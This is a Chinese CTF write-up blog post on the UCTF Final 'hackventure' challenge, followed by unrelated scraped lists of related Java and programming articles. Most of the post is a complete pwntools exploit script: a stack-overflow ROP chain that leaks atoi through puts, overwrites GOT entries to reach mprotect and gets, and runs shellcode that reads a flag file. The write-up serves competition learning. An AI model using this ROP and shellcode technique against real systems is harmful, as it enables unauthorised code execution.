UCTF Final-Hackventure
抽出世间将UCTF Final中的hackventure给记录下,算是个总结。题目是有一个游戏,游戏地图是随机生成的,用户可以攻打Server,如果3个Server都被攻占的话,那么用户就赢了,但是并没有Flag。
题目以及IDB见:http://files.cnblogs.com/files/wangaohui/hackventure-blog.zip
题目是一个C++的题目,结构体也不少,把结构体都建立后,逆起来轻松不少。把题目逆了一遍后,首先发现的是个整数溢出,然而并不知道怎么利用。其次发现的还有对空指针进行解引用造成的崩溃,以及free后全局变量区指针并没有清零等。但是这些都不知道怎么利用。后来发现一个栈溢出,而且溢出的空间很大,完全可以来做ROP,在程序本身的_libc_csu_init里有好用的通用Gadget。
漏洞位置:
EXP:
import sys
from pwn import *
#context.log_level='debug'
#by wah exe = 'hackventure'
ip = '127.0.0.1'
port = 10001
#ip = '10.250.100.12'
#port = 6666 me = [0,0]
home = [0,0]
store = [0,0]
server = [[0,0],[0,0],[0,0]] #100 10.10.10.1
#200 10.1.11.1
server100 = [0,0]
server200 = [0,0]
server300 = [0,0] def getpid():
time.sleep(0.1)
pid= pwnlib.util.proc.pidof(exe)
print pid
raw_input('go!')
def walk(f,t):
if f==t:
return
global r
x= t[0]-f[0]
y = t[1]-f[1]
#print f,t
#print x,y
if x<0:
for i in range(-x):
r.sendline('go up')
elif x>0:
for i in range(x):
r.sendline('go down')
else:
pass
if y<0:
for i in range(-y):
r.sendline('go left')
elif y>0:
for i in range(y):
r.sendline('go right')
else:
pass def getinfo():
global r,me,home,store,server,server100,server200,server300
r.recvuntil('+--------------------------------+\n')
matrix = r.recvuntil('\n+--------------------------------+\n')
print matrix
#print binascii.hexlify(matrix)
sr = []
for i in range(len(matrix)):
if matrix[i] == 'T':
s = i
elif matrix[i] == 'S':
sr.append(i)
elif matrix[i] == 'H':
h = i
elif matrix[i] == '*':
m = i
else:
pass
me[1] = m%35
me[0] = m/35+1 home[1] = h%35
home[0] = h/35+1 store[1] = s%35
store[0] = s/35+1 server[0][1] = sr[0]%35
server[0][0] = sr[0]/35+1 server[1][1] = sr[1]%35
server[1][0] = sr[1]/35+1 server[2][1] = sr[2]%35
server[2][0] = sr[2]/35+1 walk(me,server[0])
me = server[0]
r.sendline('explore')
r.recvuntil('IP: ')
ip = r.recvuntil('\n').strip()
#print ip
r.recvuntil('HP: ')
hp = r.recvuntil('\n').strip()
if ip == '10.10.10.1':
server100 = server[0]
elif ip == '10.1.11.1':
server200 = server[0]
else:
server300 = server[0]
data = r.recvuntil('$ ') walk(me,server[1])
me = server[1]
r.sendline('explore')
r.recvuntil('IP: ')
ip = r.recvuntil('\n').strip()
#print ip
r.recvuntil('HP: ')
hp = r.recvuntil('\n').strip()
if ip == '10.10.10.1':
server100 = server[1]
elif ip == '10.1.11.1':
server200 = server[1]
else:
server300 = server[1]
data = r.recvuntil('$ ') walk(me,server[2])
me = server[2]
r.sendline('explore')
r.recvuntil('IP: ')
ip = r.recvuntil('\n').strip()
#print ip
r.recvuntil('HP: ')
hp = r.recvuntil('\n').strip()
if ip == '10.10.10.1':
server100 = server[2]
elif ip == '10.1.11.1':
server200 = server[2]
else:
server300 = server[2]
data = r.recvuntil('$ ')
#print server100,server200,server300
def local_attack():
r.sendline('local_attack')
def remote_attack(ip):
r.sendline('remote_attack ' + ip)
def remote_attacks(ips):
r.sendline('remote_attacks ' + ips) r = remote(ip,port)
r.sendline('map')
getinfo() walk(me,server100)
me=server100 local_attack()
local_attack()
r.recvuntil('You have compromised server 10.10.10.1, good job!\n')
r.sendline('')
r.recvuntil('Name? ')
r.sendline('wah')
#remote_attack('10.1.11.1') r.sendline('status')
r.recvuntil('*** Hacker\'s Profile ***')
r.recvuntil('$ ') walk(me,home)
me=home r.sendline('goodnight')
walk(me,server100)
me=server100
getpid() sc = '''call a;
a:pop rcx;
add rcx,35
push rcx
ret
.string "/home/flag/hackventure/flag";
lea rdi,[rcx-28];
mov rax,2;
mov rsi,0;
syscall;
mov rdi,rax;
xor rax,rax;
mov rsi,0x605200;
mov rdx,16;
syscall;
mov rdi,1;
mov rsi,0x605200;
mov rdx,16;
mov rax,1;
syscall;
mov rax,60;
xor rdi,rdi;
syscall;'''
shellcode=asm(sc,arch='amd64',os='linux') fakeebp = 0xaaaaaaaaaaaaaaaa
pop_rdi_ret = 0x4029F3
pop_rsi_r15_ret = 0x4029F1
atoi_got = 0x604098
puts_plt = 0x400840
call_getstring = 0x4014BC
#buf_to_store_mprotect = 0x604600
buf_to_store_mprotect_gets = 0x6040A0
buflen = 18
rubbish = 0xaaaaaaaa
pop_rbx_rbp_r12_r13_r14_r15_ret = 0x4029EA
call_mprotect = 0x4029D0
memo_to_exec = 0x604000
memo_len = 0x3000
memo_prot = 0x7
shellcode_addr = 0x605000
shellcode_len = 0x1000
plt_jmp_gets = 0x400940 rop = ''
rop += p64(pop_rdi_ret)
rop += p64(atoi_got)
rop += p64(puts_plt) rop += p64(pop_rdi_ret)
rop += p64(buf_to_store_mprotect_gets)
rop += p64(pop_rsi_r15_ret)
rop += p64(buflen)
rop += p64(rubbish)
rop += p64(call_getstring)
rop += 'a'*0x68 rop += p64(pop_rbx_rbp_r12_r13_r14_r15_ret)
rop += p64(0)
rop += p64(1)
rop += p64(buf_to_store_mprotect_gets)
rop += p64(memo_prot)
rop += p64(memo_len)
rop += p64(memo_to_exec)
rop += p64(call_mprotect) rop += p64(rubbish)
rop += p64(0)#rbx
rop += p64(0)#rbp
rop += p64(0)#r12
rop += p64(0)#r13
rop += p64(0)#r14
rop += p64(0)#r15
rop += p64(pop_rdi_ret)
rop += p64(shellcode_addr)
rop += p64(plt_jmp_gets)
rop += p64(shellcode_addr) fuck1 = p64(fakeebp) + rop
remote_attacks('1,2,3,4,'+fuck1)
walk(me,server300)
local_attack()
local_attack()
local_attack()
local_attack()
local_attack()
r.recvuntil('Game Over!\n')
data = r.recvuntil('\n')[:-1]
atoi = u64(data + (8-len(data))*'\x00')
log.info("Leaked atoi: "+hex(atoi)) mprotect = atoi+0xbaa30
gets = atoi +0x354d0
data = p64(mprotect) + p64(gets)
#overwrite got to mprotect and gets
r.sendline(data)
#write shellcode
r.sendline(shellcode)
r.recvuntil('Please own this server first.\n')
flag = r.recv(16)
print flag
r.close()
UCTF Final-Hackventure的更多相关文章
- java抽象、接口 和final
抽象 一.抽象类:不知道是具体什么东西的类. abstract class 类名 1.抽象类不能直接new出来. 2.抽象类可以没有抽象方法. public abstract class USB { ...
- Java内部类final语义实现
本文描述在java内部类中,经常会引用外部类的变量信息.但是这些变量信息是如何传递给内部类的,在表面上并没有相应的线索.本文从字节码层描述在内部类中是如何实现这些语义的. 本地临时变量 基本类型 fi ...
- Java关键字final、static
一.final根据程序上下文环境,Java关键字final有“这是无法改变的”或者“终态的”含义,它可以修饰非抽象类.非抽象类成员方法和变量.你可能出于两种理解而需要阻止改变:设计或效率. final ...
- JavaSE 之 final 初探
我们先看一道面试题: 请问 final 的含义是什么?可以用在哪里?其初始化的方式有哪些? 首先我们回答一下这道题,然后再探究其所以然. 1.final 表示“最终的”.“不可改变的”,意指其修饰类 ...
- PHP的final关键字、static关键字、const关键字
在PHP5中新增加了final关键字,它可以加载类或类中方法前.但不能使用final标识成员属性,虽然final有常量的意思,但在php中定义常量是使用define()函数来完成的. final关键字 ...
- final修饰符
final本身的含义是"最终的,不可变的",它可以修饰非抽象类,非抽象方法和变量.注意:构造方法不能使用final修饰,因为构造方法不能被继承,肯定是最终的. final修饰的类: ...
- 浅析Java中的final关键字(转载)
自http://www.cnblogs.com/dolphin0520/p/3736238.html转载 一.final关键字的基本用法 在Java中,final关键字可以用来修饰类.方法和变量(包括 ...
- java关键字extends(继承)、Supe(父类引用空间)、 This(方法调用者对象)、Instanceof(实例类型-判断对象是否属于某个类)、final(最终)、abstract(抽象) 、interface(接口)0
java 继承使用关键字extends 继承的作用:减少代码量,优化代码 继承的使用注意点: 1子类不能继承父类的私有变量 2.子类不能继承父类的构造方法 3.子类在调用自己的构造方法时 会默认调 ...
- files list file for package 'xxx' is missing final newline
#!/usr/bin/python # 8th November, 2009 # update manager failed, giving me the error: # 'files list f ...
随机推荐
- Java中日期时间API小结
Java中为处理日期和时间提供了大量的API,确实有把一件简单的事情搞复杂的嫌疑,各种类:Date Time Timestamp Calendar...,但是如果能够看到时间处理的本质就可以轻松hol ...
- _js day12
- [转] iOS使用NSMutableAttributedString 实现富文本(不同颜色字体、下划线等)
转自: 在iOS开发中,常常会有一段文字显示不同的颜色和字体,或者给某几个文字加删除线或下划线的需求.之前在网上找了一些资料,有的是重绘UILabel的textLayer,有的是用html5实现的,都 ...
- SQLSERVER内核架构剖析 (转)
我们做管理软件的,主要核心就在数据存储管理上.所以数据库设计是我们的重中之重.为了让我们的管理软件能够稳定.可扩展.性能优秀.可跟踪排错. 可升级部署.可插件运行,我们往往研发自己的管理软件开发平台. ...
- "客户端无法连接到远程计算机"错误的解决方法
问题: 客户端无法连接到远程计算机. 可能没有启用远程连接或者计算机太忙不能接受新的连接. 也可能是网络问题阻止连接.请稍后重新尝试连接. 如果问题仍然存在 请与管理员联系. 解决方法: 1.首先确认 ...
- NSDictionary使用小结
http://blog.csdn.net/ms2146/article/details/8656787
- hdu Find a way
算法:广搜: Description Pass a year learning in Hangzhou, yifenfei arrival hometown Ningbo at finally. Le ...
- Android成长记(1)-----android环境搭建与adb shell 命令
整理一下学习android一步一步存下来的自己总结或是从网上摘抄的比较不错的文档,电脑要上交了,最舍不得的就是自己积累的这么点东西了,所以决定发布到黎梓小站,以供大家一起学习以及自己日后忘记了也有地方 ...
- 移动端Web开发笔记
最近写的一个移动端项目:上海 地铁指路通,之间遇到的一些问题,记录下来(以后会不断补充的): 1. 丰富的页面Meta: 1.1: 控制显示区域各种属性: <meta content=" ...
- <c:if>标签
<c:if>的用途就和我们一般在程序中用的if一样. 语法 语法1:没有本体内容(body) <c:if test="testCondition" var=&qu ...